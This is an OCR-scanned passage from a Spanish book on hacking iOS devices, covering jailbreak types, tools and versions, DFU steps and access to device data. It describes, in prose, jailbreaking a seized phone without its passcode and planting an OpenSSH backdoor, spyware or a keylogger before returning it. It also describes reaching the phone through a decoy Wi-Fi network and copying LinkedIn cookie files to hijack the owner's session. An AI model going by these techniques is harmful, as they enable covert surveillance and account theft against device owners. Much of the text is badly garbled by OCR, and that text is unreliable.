repositorios  no  oficiales,  en  donde  se  encuentran  aplicaciones  crackeadas,  o  dicho  de  otra  maiiera, 
apps  a  las  que  se  las  ha  eliminado  la  protección  o  DRM. 

En  realidad,  el  Jailb^'eak es  mucho  más  importante  para  la  comunidad  de  seguridad,  que  el  hecho  de 
ahorrarse  unos  cuantos  dólares  o  euros,  al  instalar  software  sin  pagar  por  él. 


Tipos  de  Jailbreak 

A  la  largo  de  la  historia  del  sistema  operativo  iOS,  los  usuarios  han  realizado  Jailbreak  a  sus 

dispositivos,  y  en  la  mayoria  de  las  versiones  de  ¿OS\  Pero  no  todos  los  procesos  de  Jailbreak 
han  ofrecidu  el  mismo  conjunto  de  características,  y  es  que  esto  depende  cu  gran  parte  de  las 
posibilidades  que  ofrezca  la  vulnerabilidad  de  seguridad  explotada  para  bypassear  las  restricciones 
del  dispositivo. 

Una  vez  que  las  vulnerabilidades  son  explotadas,  inmediataniente  se  hacen  públicas,  de  manera  que 
son  parcheadas  cuanto  antes  por  Apple  (normalmente  eii  la  siguiente  versión  de  i  OS)  por  lo  que  casi 
en  cada  nueva  versión  de  ¿OS,  es  necesario  encontrar  nuevas  vulnerabilidades.  Es  por  ello  que  los 
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autores  de  las  soluciones  de  JaUbreak  demandan  colaboración  a  la  com unidad  de  investigadores^  ya 
que  cada  nueva  versión  es  un  nuevo  reto. 

Además,  liay  que  Leiier  en  cucnta_  que  algunas  Inera  b  i  lid  ades  residen  en  X^BootRom,  por  lo  que 
n<]  es  posible  parchearlas  con  actualizaciones  software,  sino  que  habrá  que  revisar  el  hardware  de 
los  terminales  ¡Fhonc,  iPack  etcétera^  Esto  hace  que  se  requiera  un  mayor  liempo  para  subsanarlas  y 
reemplazar  los  chips  de  los  dispositivos. 

Dependiendo  del  tipo  de  vulnerabilidad  útil  izada  para  desanollarel  JaUbreak,  los  ereuLos  de  realizarlo 
serán  persistentes  o  desaparecemn  en  cuanto  se  rekiicie  el  disposi  Li  vo,  por  lo  que  básicamente  existen 
dos  tipos  principales  de  JaUbreak: 

-  Telliered:  Fs  un  tipo  de  JaUbreak  que  desaparece  cuando  el  dispositivo  “rearranea”  de 
nuevo,  por  lo  que  se  requiere  realizar  el  proceso  en  cada  nuevo  arranque.  Clomo  este  proceso 
necesita  que  el  terminal  se  euuectc  con  el  cable  U$R  al  ordenador  para  ''reaiTancar”_  meibe 
de  ahí  su  nombre,  que  significa  algo  así  como  '^atado”,  debido  a  la  dependencia  dcl  cable. 

-  ITntethered:  Es  un  tipo  de  JaUbreak  que  no  desaparece  cada  vez  que  ef  dispositivo  se 
‘Te arranca'".  Evidentemente  es  una  mejor  forma  de  JaUbreak  para  los  usuarios  que  quieran 
tener  siempre  el  Lcnninal  en  este  estado,  aunque  también  tiene  el  inconveniente  de  que  es  más 
difícil  de  conseguir,  ya  que  requiere  de  vulnerabilidades  específicas  dcl  sistema  de  arranque. 

Históricamente  han  existido  vulnerabilidades  mny  potentes  en  el  BooiRom.  pero  a  día  de  hoy  ya  no 
hay  nada  parecido  desde  que  Apple  sacó  los  dispositivos  con  chipset  A5,  AJiora  los  exploits  son  una 
combinación  de  un  Tethered  JaUbreak  más  exploits  adicionales,  que  permiJan  la  persistencia  en  el 
dispositivo. 

El  Tethered  JaUbreak  se  utiliza  para  instalar  los  exploits  adicionales  en  el  sistema  de  ficheros.  Esto 
hace  que  se  requieran  dos  exploits  como  mínimo,  uno  para  ejecutar  código  arbitrario  no  firmado, 
y  otra  para  elevar  pnvilegios  y  poder  hacer  el  paich  al  kernel.  Con  lo  cual,  y  una  vez  aclarado  este 
punto,  se  puede  apreciar  la  dificultad  de  conseguir  un  Unthethered  JaiibreaL  y  se  puede  entender 
el  íTioiivti  píjr  d  que  cada  día  los  investigadores  tardan  más  eii  liberar  herramientas  que  realicen 
üntethered  JaUbreak. 

Desde  el  punto  de  vista  de  un  invesLigador  de  seguridad,  un  auditor  o  un  analista  tbreiise,  la 
aplicación  de  cada  tipo  de  JaUbreak  será  mejor  para  cada  ocasión.  En  el  caso  de  una  audi Loria  de 
seguridad  donde  solo  se  quiere  acceder  a  los  datos  (también  en  un  análisis  forense)  la  explotación 
de  un  Teliered  JaUbreak  que  permita  acceder  a  los  datos  y  luego  dejar  el  dispositivo  en  su  estado 
original  es  quizás  lo  más  recomendable.  Sin  embargo,  si  lo  que  se  quiere  es  instalar  un  mahvare  o 
un  keyiogger.  es  necesario  que  e)  sistema  siga  funcionando  después  de  cada  reí  ni  c  i  o,  por  lo  que  lo 
deseable  seria  aplicar  un  Üntethered  JaUbreak . 

Hay  que  tener  en  cuenta  (pie  la  mayoría  de  las  herramientas  de  JaUbreak,  primero  periiiiiíafi  hacer 
Tethered  JaUbreak,  y  cuando  se  descubren  los  exploiís  necesarios  pasar  a  hacer  í  ¡ntethered  JaUbreak. 
Por  lo  tanto  es  posible  que,  si  lo  que  se  desea  es  hacer  un  JaUbreak  no  persistente,  se  necesite  una 
versií'm  an ligua  de  la  herramienTa. 
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A  diit  hí  jy,  hay  rcpíísiLísritks  piiblic^ys  tic  ioáñ^  las  versíojies  de  todas  las  herraínientaSs  así  que  no 
se  debería  tener  problemas  en  localizar  una  versión  que  haga  el  JaUbreak  que  se  necesite  en  cada 
momento.  Lo  recomendable  es  crear  un  nepositorio  propio  de  software  y  mantenei'  una  copia  de 
todas  las  versiones  de  todas  las  h  erra  mí  en  Las. 

Herr^imientus  de  JaUbreak 

Aunque  las  principales  li en aiiii entas  para  hñ.cei  JaUbreak  son  Redsn(h\\  EvasiOti  y  Absmf he,  existen 
otras  herraTnientas  para  realizar  un  proceso  ácJaiíhreak.  En  este  punto  se  van  a  recoger  las  yersiones 
de  cada  una  de  ellas,  para  que  se  sepa  por  cual  es  posible  decidirse  en  cada  caso,  pero  en  caso 
de  dudas  o  si  se  necesita  ir  mas  rápido,  en  internet  existen  varios  Wizards,  que  guían  sobre  qué 
herramientas  funcionan  en  cada  dispositivo  y  versidr  de  iOS^  como  por  ejemplo  Jailbreák-meA'nfip 
y  i  Clarifíed.  coniUailbreak^ 


Es  ^11  bbinrsriliiTV  Applfl  JaÉIbreDheable  v/o  E>esblDqueable  l 
DlsíHKÜfvo:  Modele:  ÍOS;  MwE^he;  PtdLdfin-nid: 

|iPhcn&  Q  1 4  lal  B  1 6.0.0  1^  B  p  B  I  WÍEiLbvf ti  B 


Jmagen  03. Ü9:  Wizünf  de  J¿i!¿bre¿¡k-fi7&.mfK.K 


•  JaÜbrcakMc:  Fue  el  proyecto  de  Cornex,  y  se  basa  en  explotación  mediante  la  visita  con 
el  dispositivo  a  una  página  web  (htíp:ÁMninv\ Ja} ibvMkMe.com')  que  ataca  al  sistema  y  realiza 
Uruethered  Jaiihreak.  La  úlnma  versión  de  este  se  estudia  en  proílindidad  en  el  capítulo  de 
JailOwnMe.  En  todos  loa  casos  se  requiere  que  la  sesión  esté  abíerla..  por  lo  que  es  necesario 
conocer  previamente  el  passeode.  Ma  habido  tres  generaciones: 

-  JaiibreakMe:  Para  sistemas  ¡OS  L 1, 1  ^  iOS  2.0 

JailhreükMe  2.0  (Síar):  Para  sistemas  iOS  J.  1 .2  a  iOS  4.0. 1 .  En  la  rama  3.x  se  pareticu  cii 
la  versión  3.2,2. 

-  JaiibreakMe  3,0  (Safñron):  Para  i  OS  ‘íí.3  a  4.33  y  pam  iPhone  4  CDMzVen  versiones  4.2.6 
'd  4.2.8. 

"  Absinthe:  Herramienta  para  Jaiibre^k  en  dispositivos  con  chipset  A5,  es  decir,  funciona  con 
¿Fhone  4S  y  con  IPad  2  y  sopoita  las  versiones  de  íOS  5  a  IOS  5.7.7.  Requiere  que  el  sistema 
este  concciadcí  a  un  sistema  pareado  (í  tener  el  passeode  dcl  temiinal  antes  de  hacer  el  Jaíibreak 
para  parearlo. 

•  EvasLOn;  Herramienta  para  hacer  Jaiit^reak  en  dispositivos  con  IOS  6  a  ó.  1,2,  Se  basa  en  ios 
exploits  deseubi crios  por  los  evadJr.w  Se  requiere  tener  el  pcLsseode  antes  de  hacer  el  proceso  de 
JaUbreak,  ya  que  los  expioits  se  lanzan  con  iOS  arrancado. 
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*  Purple  rain:  Hen'ainieiita  de  Jailhreak  para  iPhoní^  3GS  ;:t)n  fO.S'.i.O  L’rada  por  Gúohoí.  No 

i  t'eqaiej  e  passcodt. 

j  *  Bbi^knil  n :  Evolución  de  Pnrpleral n  para  iFhone  JG/SüS.  Sopona  iOS  3, 1 ,  iOS  i-  L 1  e  iOS 
I  i.  1.2.  No  requiere púíiscode.  También  es  de  Geohoí, 

I  •  Spirít:  Creada  por  Geohoí  pmd  Lotitjs  los  dispositivíís  ctín  f  OS  1 .2  a  íOS  3.2.  i  lace  rehered 
r  Jüllbreak  y  requiere  címíiccr  el  pas,^code  y  usar  íTimes. 

L  *  Li mera  1  n :  1  lerraiuienta  de  Gcohot  q ue  hace  Tetlwred  Jailbívak  en  disposki  vos  iPhüf  ie  3GS, 
I  iPhone  4  y  iPcid  i,  usando  uii  expía  i ¿  de  Bao! Rom.  Es  el  expió  it  base  para  todos  \o^  Jai!  break  de 
I  tenniiiales  con  chipset  A4.  No  requiere 

*  Oreen  PüísO n :  Usa  el  exploñ  SÍMTter  en  ^IBootRom  que  Apple  descubrió  en  el  cíiip  A5  anics 
de  sacarlo,  lo  que  hubiera  pcrmilido  hacer  Jtidbreak  en  todos  los  equipos  con  A5  en  arranque  y 
sin  pasA-code.  Soporta  iPad  i  {¡OS  322),  ¡Phone  3GS  (iOS  4A  )  y  los  IPhone  4  (¿OS  4.  l  a  iOS 
4.2.1).  No  requiere  passeode  y  hace  TeiheredJailbreaL 

-  KedsiiOTv;  Es  la  herraruienlji  de  Jadbreak  por  excelencia  para  terminales  IPhone  3GS, 
íPhone  4  c  iPad  K  aunque  a  día  de  hoy  soporta  el  exploit  Corona  pam  iPhorie  4S,  iPcid 2  o  iPad 
3,  Pennite  hacer  Tethcívd  y  Uiitlietliered  Jcdibreak  (dependiendo  de  las  versión  de  RedsnOw  que 
hay  más  de  50)  de  iOS  3  a  iOS  5.L  I.  En  iOS  6^  permite  hacer  solo  Teíhered  Jailbfvak  En  sus 
prinrems  versiones  se  llamaba  QmckPwn,  pero  le  cambiaron  el  nombre  rápidamente.  Para  saber 
la  versión  exacta  se  necesita  pam  hacer  Uníethered  Jatlbreak  a  una  versión  de  iOS  en  concreto. 
es  posible  consultar  su  ficha  en  iFhíme  JVíki:  hí/p://thetphonewíkl.  com/wtki/Red5u0w 

Desde  el  punto  de  vista  de  un  auditor,  si  el  terminal  es  iin  iPhone  3GS  o  tiene  un  chip  A4  se  puede 
utilizar  Redsníhv  que  no  requiere  el  pmscode  y  se  podrá  hacer  siempre  un  Jailbreak  y  acceder  a  los 
datos.  Si  el  dispositivo  es  un  iPhone  4S,  un  ¡Phone  3,  un  IPad  2,  un  íPad 3  o  un  iPad  4,  habrá  que  ir 
a  Absinthe  o  EvmlOn  y  se  necesitará  d\  pas.s cade  para  capturar  los  datos. 

Adía  de  hoy,  los  sisiemas  iOS  6.1 3  no  Xitntn  Jailbreak  así  que  se  cieiraii  las  opciones  si  el  dispositivo 
está  en  esa  versión  y  solo  se  podrá  acceder  a  los  datos  teniendo  el  passeode  y  pareando  con  él  un 
equipo  con 


Herramientas  de  Jailbreak  por  DFU  Pwnd 

Existe  im  método  de  realizar /£7//Z»rÉ'íj/:  a  los  dispositivos  que  hay  que  intentar  evitar  a  la  hora  de  hacer 
una  auditoría  de  seguridad  o  un  análisis  del  dispositivo,  es  el  DI  ’U  Pwnd.  Este  método  lo  que  hace 
es  construir  im  fírmware  concreto  personalizado,  con  el  Jallln^eak  ya  realizado*  Después,  usando  las 
capacidades  de  Backup  y  Re  store  de  Apple  ¡Tunes  solí  res  cribe  el  sistema  operativo  antenor  e  instala 
el  nuevo  con  el  proceso  ác  Jüühreúky?^  personalizado.  Este  tipo  de  ataques  bon'aría  todos  los  datos 
que  tuviera  el  terminal  y  haría  que  requisar*  el  tenmnal  no  hubiera  sido  fiuctítéro. 

Este  método  es  útil  para  aquellos  usuarios  que  quieren  insLalar  una  versión  anterior  del  sistema 
operativo  y  modificar  ‘¿\  fírmware,  pero  no  para  obtener  datos  del  terminal.  Herramientas  populares 


62 


Hacklng  de  dispositivos  ¡OS:  iPhone  &  iPad 


de  JaUbreak  como  liedsnOw  permiten  esie  método  cuE^ndo  se  quiere  hacer  un  '"Custom  FirmwarE'\ 
pero  hay  otras  que  solo  utilizan  este  iiieoüiiismo,  como  son  Sn(h'vBree^i:‘-  o  PwnageTooL 


El  Unlock  de  un  dispositivo 

Un  término  que  se  suele  conñindir  mucho  con  el  de  Jailb}'eak  es  el  de  IJnlnck^  que  se  uLili/a  para 
deíiair  el  proceso  de  liberación  de  un  dispositivo  del  bloqueo  de  operadora  de  comimicaciones. 
Muchas  operadoras  que  dislnbuycn  Icmiitialcs  ¿Fhane  por  medio  de  planes  de  permanencia,  atan  el 
uso  de  ese  IPhone  o  iPad a  tarjetas  SIM  solo  de  esa  compañía. 

Romper  esa  atadura  es  lo  que  se  conoce  como  Unlock,  y  todas  las  herramientas,  como  la  popular 
UítraSn(h\^^  utilizan  exploíis  de  v  uliieiabiiidades  encontradas  en  ^I  firmware  de  la  banda  base  del 
modem  del  terminaL  Para  un  proceso  de  andiií>TÍa  en  el  que  se  busque  obtener  dalos  de  un  sistema 
o  instalar  un  soltware  de  control  remoto,  las  herramientas  para  realizar  Unlock  no  serían  de  mucha 
utilidad. 


Imagen  03,10:  para  hacer  Unlock, 


Como  infonn ación  atiieional,  para  la  realización  de  Unlock  a  Icniiinales,  chisten  unas  tarjetas 
especiales,  conocidas  como  SiM  intarposiers ,  Estos  chips  se  monran  en  la  bandeja  destinada  a  la 
SIM.  y  son  un  '"‘man  ín  the  midáld^  ente  la  tai^eta  SIM  y  el  hardware  de  lectura  de  la  SIM  de  los 
terminales  iPhone  o  Pad. 


4.  Realizar  el  Jailbreak 


Rn  este  apartado  se  va  a  analizar  eómtj  se  realiza  el  proceso  Jailbreak  con  algunas  lien  amientas, 
para  que  se  pneda  constatar  cómo  es  el  funcionamiento.  Tas  herramientas  que  se  van  a  utilizar  son 
RcdsnOw^  Ábsíihe  y  evslOn, 
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RcdSnO^v  con  un  dispositivo  con  chip  A4  e  iOS  6 

Lo  primero  que  se  debe  hacer  es  ejecutar  el  sofHvíire  de  RedsnOw  como  adiniuislriidor,  para  en 
sistemas  Miemsoft  Windows  o  como  usuario  sudoer  en  un  sisLema  operativo  Mac  OS  X.  Después 
aparece  la  piimera  pantalla  en  la  que  se  aprecian  las  opciones  de  inicio.  Desde  esa  pantalla  se  puede 
realizar  el  proceso  de  JaUhrcak^  o  acceder  a  los  “Extras"'  que  es  donde  se  encontrarán  las  opciones 
de  DFU  Pwnd  o  de  arranque  de  un  teiiiiinal  con  Tethered  Jailbrcak. 

hn  este  caso  se  a  ver  cómo  se  realiza  un  jsrtíceso  de  Jailhrcak,  por  lo  que  hay  que  hacer  clic  en 
el  botón  Jaílbi'ccú.  Acto  seguido  aparecerá  la  segunda  pantalla,  en  la  que  aparecen  una  serie  de 
indicaciones  que  van  desde  qué  dispositivos  están  soportados,  hasta  los  pasos  que  hay  que  dar  para 
comenzar  el  proceso  de  Jaílbreak. 


Los  pasos  con  dispositivos  de  chip  A4  son  siempre  los  mismos,  primero  se  conecta  el  dispositivo 
al  equipo,  luego  se  apaga,  y  una  vez  que  el  dispositivo  está  conectado  y  apagado,  es  momento  de 
hacer  clic  en  el  botón  Next.  En  el  caso  de  que  fuera  un  cquiptj  con  chip  Ai,  sería  necesario  tener  el 
dispositivo  pareado  qqí\  Apple  ITuncs  y  tenerlo  dcsblocjiieado  sin passeode. 


'ilteltisnB.!  TI  ni  Jt  ^  tníU.  vuirón  of  rf  daiOvi' . 

Gop^hi  3DC7-3C  J:3.I’'+hhw  Dpv  TPíart.  AJ'  r^hts  resWi'cd.  rtót 
fir  íZCTim^fiEní  líw. 


J3iI|;é¿íK  df  lll  rmtál 

tve-ytNig  dse 


Welcciiie!  Ths  is  latestveraofi  of  rídsrOWr 

CcpiTighl  20[í7-3!J12Wiarn-Otív-Ttiim,  AI  ritíiíB  reseT/Ed.  Mot 
lior  ooraaet-ddl  UH¡. 

Fúr  Ajpfjnrt,  wÁr  our  bk:<  Oí  try  seíiditfw] 


,  ¡Pad2,  diü  Pdd^ - - 

Ef  v«i  Uai/e  ar  iP?»üa-tí^S,  PadZr  or  tPadS  pieóse 
ji  norma  nitiJt  í]Ttiieni»dE|  noft. 


p  A4üiid  esitr  tlr'jífirs - — 

Lf yoü  teve bn rart#í  f^vTc*: bíA-i^Eatií.LZ,ytwíBr  Biso 
¡fin  noTnsí  moce  now  if  pnefef  ■ 


0*erif«3e^  maka  sjre  wjt  ús-jks.  e  boíh  OFF  ar-jd  FlUGG®  IN 
to  the  Mnjuts" 

U  ¡L  ia  luloff,  ^uB  tile  dsvice  tLd  die  coriputET  FEíET. 

TTieri  hstí  dovn  tiiE  Píiwc-  buhion  {on  the  edge-  of  Ihe 
cSTMt^  LT.til  ISIdE  n  Tmniv  OAP  üid  Iheri 

dde  Su  pawfTñff. 

didí  ncirt  whFTi  youriiíe»r«  SBUlí  lífFündjitjqqKJil 
yir  rf  if  ,1  s-tudem  a  neboot  loop) . 


1 


linagei]  03. 1 J :  Priiiierus  pusos  uL'n  red^nOw  para  realizar  JalibreaL 


Cuando  se  hace  clic  en  el  botón  de  A^ext,  habrá  que  poner  el  dispositivo  en  modo  DFU  (Dcvíce 
Fiymy\Kvv  Update),  proceso  que  se  deberá  rcahznr  pulsando  la  combinación  de  teclas  típicas  para 
entrai‘  en  dicho  modo  en  todos  los  terminales  iFhone.  o  iPad.  Después  de  tener  el  dispositivo  en  ese 
modo,  anromáticamente  comienza  el  proceso  de  realización  del  Jaí¡h?-^ak. 

La  combinación  de  teclas  que  pone  el  dísposilívo  cu  DFU,  es  pulsar  primero  y  durante  3  segundos  el 
bolón  de  Encendido  (Pr^uer  bfaíon),  acto  seguida  y  sin  soltar  dicho  botón  pulsar  al  mismo  tiempo  el 
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bolón  Home  durante  10  segundos,  finalmente  soltar  el  botón  de  Power  y  mantener  pulsado  soíamenle 
el  botón  Home  durante  15  segundos.  De  todas  maneras,  cada  paso  viene  delailado  por  el  propio 
software  Redsn(jM\  que  en  cada  moTTienLo  le  indica  al  usuario  lo  que  debe  ir  realizando. 


ImtLgerk  L)3.12:  Proceso  rie  cñtiR curación  del  terminal  en  iiiodoUrU  giiiudo  po¡^  RcdSufhv. 

Si  Ludo  se  ha  realizada  con'ectamente  y  a  su  debido  üempo,  comenzará  a  realizarse  el  proceso  de 
Jailbreak  a  u  tama  tic  amen  Le  en  el  dispositivo,  si  no  ha  sido  así,  se  produeirá  un  error  y  será  necesario 
cooienzar  de  nuevo  con  dicho  proceso. 

PHrneru  se  inostrará  la  iiitonTiación  del  exploit  que  se  está  lanzando.^  en  este  caso  como  es  un  chip 
A4  con  iOS  6  se  lanza  el  exploit  de  BootROOM  Iimeml?7.  Después  se  paichea  el  teme!  para  quitar 
el  Code  Slgnlfig,  y  por  nltimo  se  llega  a  las  apcioiies  de  ejecución  en  el  terminal,  una  vez  que  se  fia 
eonseguido  hacer  el  Jailbreak, 

En  este  punto  es  posible  ejecutar  código  con  la  eiicnta  de  usuario  root  y  el  passwúrd  alpim  m  el 
terminal.  Para  ello,  es  necesario  crear  un  disco  en  memona  RAM  con  lo  que  se  quiera  ejecutan 
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Imagen  03.13;  Explotando  Umemín  para  hacer  el 

Hsnami entas  de  análisis  forense  de  Lipo  eomoTcial  crean  sus  propios  Scripts  a  partir  de  este  punto 
pitra  extraer  Lodts  el  contenido  del  termiiiai  sin  necesidad  de  tener  el  pmscodi^.  Otras  herramierilas 
como  Gecko  irkone  looíkít  lanzan  el  ataque  de  fuerza  bruta  para  sacar  el  passeodp.^  y  sistemas  como 
iFhorie  Data  Prot€Ctioí%  corre  ti  iodos  los  scripís  para  sacar  las  pasawords^  volcar  datos,  u  obtener 
una  ühdk  tal  y  comí>  se  ve  en  el  capítulo  dedicado  a  e.^\^fiamework. 

Suponiendo  que  no  se  disponga  del  pmscode  del  teniiínai  se  podría  instalar  Cydía  que  es  la 
herramienta  cliente  que  da  acceso  a  la  tienda  de  aplicaciones  del  mismo  nombre  para  sistemas  IOS 
con  Jaílbn^ak,  pero  nunca  se  podría  arrancar  iOS  y  llegar  a  instalar,  por  ejemplo  un  troyano  desde 
Cydia.  o  un  troyano  utilizando  un  prov¡sio?iing  prqfiie. 

Si  por  ei  contrario,  el  passeode  ha  sido  posible  sacarlo  con  Gecko  iPhone  Toolkií^  ya  no  se  necesitaría 
hacer  dJüílbreak^  por  lo  que  se  estaña  en  la  ultima  opción,  es  decir  sin  passeode  es  posible  bacer 
el  JaUhi'eak  porque  es  un  chip  A4  y  lo  que  se  quiere  es  tener  acceso  a  los  ficheros.  En  ese  caso  es 
mejor  lanzar  íFhone  Data  Protectian. 

La  última  opción  que  queda  es  crear  un  custom  bimdle^  como  hacen  las  herramientas  forenses  para 
tener  acceso  al  sistema,  como  por  ejemplo  con  un  troyano  o  keylogger  y  devolver  el  dispositivo  a 
su  dueño. 
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Custom  bundle  de  OpenSSH 

IJníi  Rsrma  st.'n cilla  Jl:  Lonacguír  acceso  al  tenníoal  sin  tener  el  passcode  es  ínstíilar  (JpenSSH  sin 
instalar  Cydia.  Bsto  permitirá  que  se  abra  una  nueva  conexión  al  dispositivo  por  donde  conectarse, 
aunque  existe  el  problema  de  la  conectividad  con  el  íerminal. 

Si  el  disposíLivo  tiene  instalado  un  iOS  4.X,  bastará  con  analizar  cuáles  son  las  redes  IVi-Fí  que 
busca,  para  crear  una  red  señuelo  a  la  que  se  conecte  el  dispositivo  y  desde  esa  red  se  podrá  hacer  la 
conexión  al  servidor  OpenSFII  que  se  ha  mtroducido. 

Si  el  dispositivo  tiene  un  iOS  5.X o  superior,  esto  no  se  podrá  realizar,  ya  que  el  termiTial  no  libera 
las de  conexión  a  las  redes  Wi-Fi  hasta  que  no  se  lia  desbloqueado  una  vez,  por  lo  que 
la  opción  pasa  por  requisar  temporalmente  el  terminal,  hacerle  el  Jaiíhreak,  instalar  el  OpenSSH 
y  devolver  EÜcho  disposiiivo  a  su  dueño*  La  primera  vez  que  se  desbloquee  el  passcode  y  que  se 
conecte  a  una  red  l^-PFi  quedará  accesible  para  címcctarsc  vía  OpenSSH. 


Imagen  fi:Vl4:  Iníital ación  de  un  cii^iom  bmdie. 

El  cmtoni  bimdie  de  OpenSSIl  está  disponible  en  el  repositorio  de  ficheros  de  iPhone-Dev  Team 
Qn^pSoogle  Sites:  hííi7s://siíes.GoogIe.conPa/iPhone-deKCOín/fiIes/komé/.  El  fichero  que  hay  que 
descargarse  es  SSIí2  hundle.ígz  y  gtiardarlo  en  una  carpeta.  Una  vez  que  se  selecciona  la  opción  de 
Install  custom  bundle  desde  RedsnOw  se  solicitará  la  ruta  del  fichero  y  quedará  listo  para  ejecutarse 
en  el  siguiente  reiuieit>. 

Este  proceso  de  instalar  software  en  dispositivos  A4  con  cusiom  bundle  sin  conocer  el  passcode, 
podría  hacerse  igualmente  para  introducir,  por  ejemplo,  un  mahmre  especialmente  creado  para 
vigilar  la  actividail  de  los  usuarios* 


Jailbrcak  a  terminales  A5  con  iOS  5.X  usando  Absiiithe 

La  herramienta  poi  excelencia  para  hacer  jailbrek  en  dispositivos  con  chip  A5  es  .‘ÍA.vmrfte.  Permite 
hacer  tanto  Teíhered  como  Unrethered  Jailbreak,  pero  en  todos  los  casos  es  necesario  conocer  el 
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passcode  del  dispositivo  para  poder  hacerlo  ya  que  cíjmo  se  ha  explicado  no  utiliza  e^^pioits  de 
BooiRom^  por  lo  que  si  no  se  tiene  puede  ser  inútil  requisar  el  dispositivo. 

Como  se  puede  ver  en  la  imagen  sigiiisníe,  nada  más  descargar  y  ejecutar  Ja  herramienta  se  informa 
de  este  hecho.  Después,  cuando  coniienee  el  proceso  de  Jaílbreak^  la  herramienta  reiniciará  el 
dispositivo,  traiisíerirá  datos,  y  acabará  real  izando  eUííi/¿frí'rrÁ’  pero  será  necesario  en  todo  tnomeoío 
que  esté  eunectado  el  Lerminal  a  ¡Times  y  que  no  ha3^a  ningún  passcode  por  lo  que  no  se  pueden  hacer 
cosas  como  ias  hechas  previamente  con  RtdsnOw  y  los  etLsLom  hundles- 


Chronic-Oew  Airainthi  Ü  2011-2012  £Jiraníc-0«v  Tiam, 
ERpbtsby;  ©pbnetbílígt  Opimskftlsv 

^íímam.  and 

Aftwwk  by  eíOPIC  GUI  by  Hj^étuí  Sarnara  &  ©prrafceks. 

Stipo^  Oí 


l  ni  agen  0S.15:  Absífríhe  para  iOS  5.X. 

Juilbreak  a  iOS  6  en  dispositivos  con  chip  A4,  A5  y  A6 

La  Última  herrarniéTitu  tjuc  ha  sacado  la  comunidad  de  Jaillneakers  es  EuListOn.  Fsta  versión  hace 
Jaílbí^ak  en  terminales  con  iOS  6  hasta  la  versión  iOS  6.1.2.  ya  que  cuatro  de  los  seis  que 
explota  fueron  cerrados  en  esa  actualización . 

De  nuevo,  los  explom  se  encuentran  en  lo  que  se  denomina  useríand,  es  decir,  en  el  entorno  de 
usuario  por  lo  que  es  necesario  contm  con  el  passcode  y  desbloquear  el  terminal. 

fanto  los  explom  que  usa  para  dispositivos  AS  con  ¿OS  5,  como  los  que  u^nFvctsiOri  para 

dispositivos  con  chips  AS  y  A6  e  iOS  Ó.X  requieren  conocer  el  passcode^  por  lo  que  Sültj  pueden 
ser  útiles  para  instalar  softft^aie  espía  en  el  teiniiual  o  puertas  traseras  accesibles  con  (OpenSSM  en 
terminales  que  van  a  ser  deviicitos  a  sus  autentíeos  dueños,  para  conseguir  monitoñzar  las  acciones 
cfue  realice  en  el  futuro . 

Hay  que  recordar  que,  en  el  caso  de  dispositivos  con  chips  A4  incluso  con  ¿OS  6  se  puede  seguir 
haciendo  JaUbrcak  por  medio  del  exploii  de  BootRom^  por  lo  que  no  es  necesario  hacer  uso  de 
EmsíOn  para  esos  casos. 


j^cttnwic  rSfv 

wefcome  to  Abáitha  lOS  54^i.Da  unt^ered  ASjatirieakí 

Pisase  nske  a  b^doip  of  yf>ur  device  uái^  tiis  tooi  We  dont  expect  any 

bsues,  but  w*  tntnt  f^ispcnst^ie  i  vtvthíng  happen$> 

Phon«  4$  w«h  IOS  5,0.1  {9A405)  dc<the  bumir  m  bfigfei. 
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5.  Acceso  a  datos  en  el  dispositivo 

Este  punto  explica  cómo  se  puede  acceder  a  los  dalos  de  un  tenninal  en  los  casos  en  los  que  haya 
que  coger  un  dato  puntual  o  utilizar  una  herramienta  de  análisis  forense  profesional  que  los  extraiga. 

Si  se  ha  podido  aceedcr  al  püsscode  medíanle  Gecko  íPhone  Toolkfi  el  terminal  se  puede  conectar 
a  cualquier  equipo  con  Apple  íTimes,  hacer  un  backup  y  analizarlo,  o  simplemente  conectarse  a  el 
con  cualquier  herramienta  que  peniiita  acceder  al  sistema  de  ficheros,  como  por  ejemplo  ifunBox. 


Imiigen  O.í .  í  6:  cookf.p-.'i.hiníiiyüorÁjss  de  Linkedñ:  accedicUíj  con  IFuítBojc. 

Ahí  se  podi  ían  copiar  ios  ñcheros  de  binarycookws  y  preferences  de  la  cuenta  de  Linkedin  y  utilizarla 
en  otro  dispositivo  paia  acceder  a  la  sesión  deí  dueño  dei  terminal 

Si  se  ha  instalado  OpenSSH en  el  lemiinal  o  se  ha  descubieito  que  ya  estaba  instalado  previamente, 
entonces  se  puede  hacer  la  inspección  de  ficheros  mediante  un  sistema  SSHFS,  es  decir,  montando 
un  sistema  de  ficheros  por  encima  de  una  conexión  SSll.  Se  puede  utilizar  una  herramienta  como 
MacFiisíon,  donde  hay  que  configurar  lus  datos  que  se  necesitan  pam  establecer  la  conexión. 


Imagtíi]  03  17^  Conexión  SSH  en  Ad£it:Ftí.uoii. 
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Fs  deeir^  hay  que  conocer  la  dirección  IP  del  tenninal,  el  usuario  y  la  ooninLscña,  que  podría  ser  rooP 
o  mobííe,  tal  y  como  se  lia  explicado  al  principio  de  este  capítulo? 

Una  vez  establecida  la  conexión,  se  podrá  nrioníar  el  sistema  de  fícheros  simplemente  dando  clic 
en  el  botón  de  Mnnínr^  y  ya  quedará  accesible  toda  la  estiiictura  de  ficheros  remoLí)  a  Lraves  de  la 
herr  amienta. 


Iiiiagtíjj  0-3,18:  FS  rinj:iUiÜL>  subre  conexión  SSH 


Por  ultimo,  si  no  se  ha  conseguido  montar  OpenSSH  (o  un  Lroyano  en  el  sistema)  y  uo  se  ha 
J  conseguido  el  passeode^  lo  mejor  será  devolver  el  dÍHp<jsitivo  y  esperar  a  tener  más  mfoiiiiación,  o 
=fi>calizar  los  esfuerztís  en  averiguar  el passeode  u  obtener  el  equipo  donde  este  terminal  es  pareado 


^normalmente. 
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Capítulo  IV 
Atacando  el  backup 


1.  Introducción 


En  este  capítulo  se  van  a  explicar  los  pasos  que  un  intruso  podría  llevar  a  cabo  para  conseguii  el  mayor 
niimero  de  daros  e  infoniiación  de  un  sistema  con  iOS^  teniendo  en  cuenta  que  debe  de  disponer,,  ya 
sea  porque  se  tiene  acceso  físico  o  porque  remotamente  se  lia  podido  explotar  una  vulnerabilidad  da 
coíiTiguracion  (por  ejemplo  una  lista  de  permisos  más  configurada  en  la  compartición  de  ai  chivos 
de  red ),  o  de  aplicación  (por  ejemplo  un  hyg  explotado  con  Metaspioit),  y  se  ha  accedido  al  sistema 
operativo  donde  se  encuentra  instalada  la  aplicación  Apple  íTimes  dosíie  Ir  que  se  gestiona  el 
dispositivo  dd  objetivo. 

